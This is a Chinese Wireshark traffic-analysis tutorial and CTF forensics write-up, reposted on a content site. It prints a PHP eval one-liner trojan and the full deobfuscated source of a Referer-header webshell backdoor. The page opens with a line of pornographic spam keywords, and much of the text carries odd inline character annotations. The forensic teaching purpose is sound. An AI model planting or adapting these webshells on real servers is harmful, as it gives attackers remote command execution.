国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

Wireshark流量分析

這篇具有很好參考價(jià)值的文章主要介紹了Wireshark流量分析。希望對(duì)大家有所幫助。如果存在錯(cuò)誤或未考慮完全的地方,請(qǐng)大家不吝賜教,您也可以點(diǎn)擊"舉報(bào)違法"按鈕提交疑問(wèn)。

目錄

1.基本介紹

2.基本使用

1)數(shù)據(jù)包篩選:

2)篩選ip:

3)數(shù)據(jù)包還原

?4)數(shù)據(jù)提取

?3.wireshark實(shí)例


1.基本介紹

在CTF比賽中,對(duì)于流量包的分析取證是一種十分重要的題型。通常這類(lèi)題目都是會(huì)提供一個(gè)包含流量數(shù)據(jù)的pcap文件,參賽選手通過(guò)該文件篩選和過(guò)濾其中無(wú)關(guān)的流量信息,根據(jù)關(guān)鍵流量信息找出flag或者相關(guān)線索。

pcap流量包的分析通常都是通過(guò)圖形化的網(wǎng)絡(luò)嗅探器——wireshark進(jìn)行的,這款嗅探器經(jīng)過(guò)眾多開(kāi)發(fā)者的不斷完善,現(xiàn)在已經(jīng)成為使用最為廣泛的安全工具之一。接下來(lái),斗哥來(lái)為大家講解這款工具的基本使用。

Wireshark流量分析,wireshark,網(wǎng)絡(luò),測(cè)試工具

?

2.基本使用

Wireshark的基本使用分為數(shù)據(jù)包篩選、數(shù)據(jù)包搜索、數(shù)據(jù)包還原、數(shù)據(jù)提取四個(gè)部分。

1)數(shù)據(jù)包篩選:

數(shù)據(jù)包篩選功能是wireshark的核心功能,比如需要篩選出特定的協(xié)議如HTTP,Telnet等,也可能需要篩選出ip地址,端口等。

2)篩選ip:

●源ip篩選

輸入命令:ip.src == 地址

Wireshark流量分析,wireshark,網(wǎng)絡(luò),測(cè)試工具

3)數(shù)據(jù)包還原

在wireshark中,存在一個(gè)交追蹤流的功能,可以將HTTP或TCP流量集合在一起并還原成原始數(shù)據(jù),具體操作方式如下:

選中想要還原的流量包,右鍵選中,選擇追蹤流 – TCP流/UPD流/SSL流/HTTP流。

Wireshark流量分析,wireshark,網(wǎng)絡(luò),測(cè)試工具

?可在彈出的窗口中看到被還原的流量信息

Wireshark流量分析,wireshark,網(wǎng)絡(luò),測(cè)試工具

?4)數(shù)據(jù)提取

Wireshark支持提取通過(guò)http傳輸(上傳/下載)的文件內(nèi)容,方法如下:

菜刀下載文件的流量,需要?jiǎng)h除分組字節(jié)流前開(kāi)頭和結(jié)尾的X@Y字符,否則下載的文件會(huì)出錯(cuò)。鼠標(biāo)右鍵點(diǎn)擊 – 選中 顯示分組字節(jié)…

Wireshark流量分析,wireshark,網(wǎng)絡(luò),測(cè)試工具

?在彈出的窗口中設(shè)置開(kāi)始和結(jié)束的字節(jié)(原字節(jié)數(shù)開(kāi)頭加3,結(jié)尾減3)

Wireshark流量分析,wireshark,網(wǎng)絡(luò),測(cè)試工具?最后點(diǎn)擊save as按鈕導(dǎo)出。

導(dǎo)出結(jié)果:

Wireshark流量分析,wireshark,網(wǎng)絡(luò),測(cè)試工具

?

?3.wireshark實(shí)例

題目要求:

1.黑客第一次獲得的php木馬的密碼是什么

2.黑客第二次上傳php木馬是什么時(shí)間

3.第二次上傳的木馬通過(guò)HTTP協(xié)議中的哪個(gè)頭傳遞數(shù)據(jù)

題目要求php木馬的密碼,首先我們要知道php一句話木馬一般都是POST請(qǐng)求

所以我們直接過(guò)濾POST請(qǐng)求,發(fā)現(xiàn)這個(gè)IP請(qǐng)求了一個(gè)名為kkkaaa.php的php文件,很可疑

正常文件不會(huì)以此命名的, 打開(kāi)數(shù)據(jù)包看一下,發(fā)現(xiàn)了這個(gè)字段

Form item: "zzz" = "@eval(base64_decode($_POST[z0]));"

?Wireshark流量分析,wireshark,網(wǎng)絡(luò),測(cè)試工具

上傳的木馬應(yīng)該是:<?php eval($_POST['zzz']);?>

又將eval(base64_decode($_POST[z0]));傳入zzz參數(shù),目的是將z0傳入的數(shù)據(jù)進(jìn)行base64的解碼此時(shí)z0傳入base64編碼后的數(shù)據(jù),便可以執(zhí)行惡意代碼解碼后發(fā)現(xiàn)執(zhí)行了dirname函數(shù),目的是查看當(dāng)前路徑下的文件或目錄,類(lèi)似linux下的ls命令
Wireshark流量分析,wireshark,網(wǎng)絡(luò),測(cè)試工具

PHP代碼是通過(guò)混淆過(guò)的,讓我們根本看不懂他的代碼

Wireshark流量分析,wireshark,網(wǎng)絡(luò),測(cè)試工具?還原后的代碼:

<?php
$kh = "cb42";
$kf = "e130";
function x($t, $k)
{
    $c = strlen($k);
    $l = strlen($t);
    $o = "";
    for ($i = 0; $i < $l;) {
        for ($j = 0; ($j < $c && $i < $l); $j++, $i++) {
            $o .= $t{$i} ^ $k{$j};
        }
    }
    return $o;
}
 
$r = $_SERVER;
$rr = @$r["HTTP_REFERER"];
$ra = @$r["HTTP_ACCEPT_LANGUAGE"];
if ($rr && $ra) {
    $u = parse_url($rr);
    parse_str($u["query"], $q);
    $q = array_values($q);
    preg_match_all("/([\w])[\w-]+(?:;q=0.([\d]))?,?/", $ra, $m);
    if ($q && $m) {
        @session_start();
        $s =& $_SESSION;
        $ss = "substr";
        $sl = "strtolower";
        $i = $m[1][0] . $m[1][4];
        $h = $sl($ss(md5($i . $kh), 0, 3));
        $f = $sl($ss(md5($i . $kf), 0, 3));
        $p = "";
        for ($z = 1; $z < count($m[1]); $z++) $p .= $q[$m[2][$z]];
        if (strpos($p, $h) === 0) {
            $s[$i] = "";
            $p = $ss($p, 3);
        }
        if (array_key_exists($i, $s)) {
            $s[$i] .= $p;
            $e = strpos($s[$i], $f);
            if ($e) {
                $k = $kh . $kf;
                ob_start();
                @eval(@gzuncompress(@x(@base64_decode(preg_replace(array("/_/", "/-/"), array("/", "+"), $ss($s[$i], 0, $e))), $k)));
                $o = ob_get_contents();
                ob_end_clean();
                $d = base64_encode(x(gzcompress($o), $k));
                print("<$k>$d</$k>");
                @session_destroy();
            }
        }
    }
}
?>

?這個(gè)函數(shù)在8.0已經(jīng)被移除,并且和eval()函數(shù)有同樣的安全隱患

Wireshark流量分析,wireshark,網(wǎng)絡(luò),測(cè)試工具?木馬要利用,就必然會(huì)與數(shù)據(jù)包進(jìn)行交互,仔細(xì)看看這兩行代碼

?

$rr = @$r["HTTP_REFERER"];
$ra = @$r["HTTP_ACCEPT_LANGUAGE"];

獲取http請(qǐng)求中的referer和accept_language字段的,與數(shù)據(jù)包產(chǎn)生了交互,所以可以基本斷定這兩個(gè)字段是黑客用來(lái)傳輸他想執(zhí)行的命令的.我們隨便看一個(gè)訪問(wèn)footer.php的包

Wireshark流量分析,wireshark,網(wǎng)絡(luò),測(cè)試工具

?所以木馬通過(guò)HTTP協(xié)議中的referer頭傳遞數(shù)據(jù)文章來(lái)源地址http://www.zghlxwxcb.cn/news/detail-675182.html

到了這里,關(guān)于Wireshark流量分析的文章就介紹完了。如果您還想了解更多內(nèi)容,請(qǐng)?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!

本文來(lái)自互聯(lián)網(wǎng)用戶投稿,該文觀點(diǎn)僅代表作者本人,不代表本站立場(chǎng)。本站僅提供信息存儲(chǔ)空間服務(wù),不擁有所有權(quán),不承擔(dān)相關(guān)法律責(zé)任。如若轉(zhuǎn)載,請(qǐng)注明出處: 如若內(nèi)容造成侵權(quán)/違法違規(guī)/事實(shí)不符,請(qǐng)點(diǎn)擊違法舉報(bào)進(jìn)行投訴反饋,一經(jīng)查實(shí),立即刪除!

領(lǐng)支付寶紅包贊助服務(wù)器費(fèi)用

相關(guān)文章

  • 滲透測(cè)試(12)- WireShark 網(wǎng)絡(luò)數(shù)據(jù)包分析

    滲透測(cè)試(12)- WireShark 網(wǎng)絡(luò)數(shù)據(jù)包分析

    目錄 1、WireShack 簡(jiǎn)介??? 2、WireShark 基本使用方法 3、 WireShack 抓包分析 3.1 Hypertext Transfer Protocol (應(yīng)用層) 3.2 Transmission Control Protocol (傳輸層) 3.3 Internet Protocol Version 4(網(wǎng)絡(luò)層) 3.4 Ethernet Il (鏈路層): 數(shù)據(jù)鏈路層以太網(wǎng)頭部信息 3.5 Frame(物理層) ????????Wireshark 是一個(gè)免費(fèi)開(kāi)源

    2024年01月18日
    瀏覽(13)
  • 流量分析:wireshark的使用

    流量分析:wireshark的使用

    wireshark使用教程博客 https://www.cnblogs.com/cainiao-chuanqi/p/15910553.html?spm=wolai.workspace.0.0.3768135baBU0KJ 1、過(guò)濾查看包含某字符串的HTTP數(shù)據(jù)包: http contains \\\"string\\\" (tcp同理) 2 、過(guò)濾查看請(qǐng)求某一url的流量: http.request.url ==\\\"path\\\" 或 http.request.url contains \\\"path\\\" 3、過(guò)濾某一ip的流量: ip.addr =

    2024年02月10日
    瀏覽(24)
  • Wireshark流量分析

    Wireshark流量分析

    目錄 1.基本介紹 2.基本使用 1)數(shù)據(jù)包篩選: 2)篩選ip: 3)數(shù)據(jù)包還原 ?4)數(shù)據(jù)提取 ?3.wireshark實(shí)例 1. 基本介紹 在CTF比賽中,對(duì)于流量包的分析取證是一種十分重要的題型。通常這類(lèi)題目都是會(huì)提供一個(gè)包含流量數(shù)據(jù)的pcap文件,參賽選手通過(guò)該文件篩選和過(guò)濾其中無(wú)關(guān)的流

    2024年02月11日
    瀏覽(16)
  • Wireshark流量分析例題

    Wireshark流量分析例題

    目錄 前言? 一、題目一(1.pcap) 二、題目二(2.pcap) 三、題目三(3.pcap) 四、題目四(4.pcap) Wireshark流量包分析對(duì)于安全來(lái)說(shuō)是很重要的,我們可以通過(guò)Wireshark來(lái)診斷網(wǎng)絡(luò)問(wèn)題,檢測(cè)網(wǎng)絡(luò)攻擊、監(jiān)控網(wǎng)絡(luò)流量以及捕獲惡意軟件等等 接下來(lái)我們來(lái)看一道數(shù)據(jù)分析題,需要4個(gè)流量包 1-

    2024年02月11日
    瀏覽(20)
  • 簡(jiǎn)單流量分析CTF(wireshark)

    簡(jiǎn)單流量分析CTF(wireshark)

    沒(méi)做過(guò)流量分析的題目,也不怎么了解怎么流量分析,準(zhǔn)備系統(tǒng)的理一下思路。。 這有第一個(gè)小題目。通過(guò)幾個(gè)題目來(lái)了解wireshark的使用以及流量分析吧。。 bugku的雜項(xiàng)題目。 鏈接:https://pan.baidu.com/s/1OnO7OXIQB8ztl8J2q48jBA 提取碼:1111 這是一個(gè) pacp文件? 是一種常用的數(shù)據(jù)報(bào)存

    2024年02月07日
    瀏覽(26)
  • 開(kāi)源且強(qiáng)大的網(wǎng)絡(luò)嗅探分析工具——Wireshark

    開(kāi)源且強(qiáng)大的網(wǎng)絡(luò)嗅探分析工具——Wireshark

    Wireshark是一款強(qiáng)大的開(kāi)源網(wǎng)絡(luò)協(xié)議分析工具,旨在幫助用戶深入了解網(wǎng)絡(luò)通信的細(xì)節(jié)。通過(guò)捕獲、解析和展示網(wǎng)絡(luò)數(shù)據(jù)包,Wireshark能夠幫助工程師診斷問(wèn)題、優(yōu)化性能,以及解決各種網(wǎng)絡(luò)難題。無(wú)論是深入分析還是快速調(diào)試,Wireshark都是不可或缺的工具之一。 安裝和啟動(dòng) 你

    2024年02月10日
    瀏覽(35)
  • suricata初體驗(yàn)+wireshark流量分析

    suricata初體驗(yàn)+wireshark流量分析

    目錄 一、suricata介紹 1.下載安裝 2.如何使用-攻擊模擬 二、wireshark流量分析 1.wireshark過(guò)濾器使用 ?2.wireshark其他使用 通過(guò)官網(wǎng)下載suricata,根據(jù)官網(wǎng)步驟進(jìn)行安裝。 ? ?以上配置完畢后,重啟suricata。 ?進(jìn)入wazuh匹配文件,需將suricata加入,使wazuh代理可以讀取suricata日志文件。

    2024年02月11日
    瀏覽(57)
  • Wireshark流量分析還原zip文件

    Wireshark流量分析還原zip文件

    以下內(nèi)容為數(shù)據(jù)取證靶場(chǎng)題目 通過(guò)提示下載流量包,導(dǎo)入到wireshark開(kāi)始分析 此處發(fā)現(xiàn)訪問(wèn)了可疑的壓縮包文件 通過(guò)右鍵 追蹤TCP流 進(jìn)一步分析 以下為該壓縮包的請(qǐng)求包和響應(yīng)包內(nèi)容,我們需要的是響應(yīng)包中的響應(yīng)體 選中該http請(qǐng)求后,選擇Media Type,右鍵選擇 導(dǎo)出分組字節(jié)流

    2024年02月17日
    瀏覽(26)
  • Wireshark網(wǎng)絡(luò)封包分析工具介紹+過(guò)濾器表達(dá)式語(yǔ)法

    Wireshark網(wǎng)絡(luò)封包分析工具介紹+過(guò)濾器表達(dá)式語(yǔ)法

    學(xué)習(xí)目錄 一、WireShark界面說(shuō)明: 1、開(kāi)始捕捉界面: 2、捕捉結(jié)果界面: 3、著色規(guī)則: 二、捕捉過(guò)濾器: 1、捕捉過(guò)濾器表達(dá)式: 2、捕捉過(guò)濾器語(yǔ)法: 三、顯示過(guò)濾器: 1、基本過(guò)濾表達(dá)式: 2、復(fù)合過(guò)濾表達(dá)示: 3、常見(jiàn)用顯示過(guò)濾需求及其對(duì)應(yīng)表達(dá)式: WireShark安裝,安

    2024年01月16日
    瀏覽(19)
  • 用wireshark流量分析的四個(gè)案例

    用wireshark流量分析的四個(gè)案例

    目錄 第一題 1 2 3 4 第二題 1 2 3. 第三題 1 2 第四題 1 2 3 題目: 1.黑客攻擊的第一個(gè)受害主機(jī)的網(wǎng)卡IP地址 2.黑客對(duì)URL的哪一個(gè)參數(shù)實(shí)施了SQL注入 3.第一個(gè)受害主機(jī)網(wǎng)站數(shù)據(jù)庫(kù)的表前綴(加上下劃線例如abc ) 4.第一個(gè)受害主機(jī)網(wǎng)站數(shù)據(jù)庫(kù)的名字 打開(kāi)流量包,直接篩選http || tls找

    2024年02月10日
    瀏覽(27)

覺(jué)得文章有用就打賞一下文章作者

支付寶掃一掃打賞

博客贊助

微信掃一掃打賞

請(qǐng)作者喝杯咖啡吧~博客贊助

支付寶掃一掃領(lǐng)取紅包,優(yōu)惠每天領(lǐng)

二維碼1

領(lǐng)取紅包

二維碼2

領(lǐng)紅包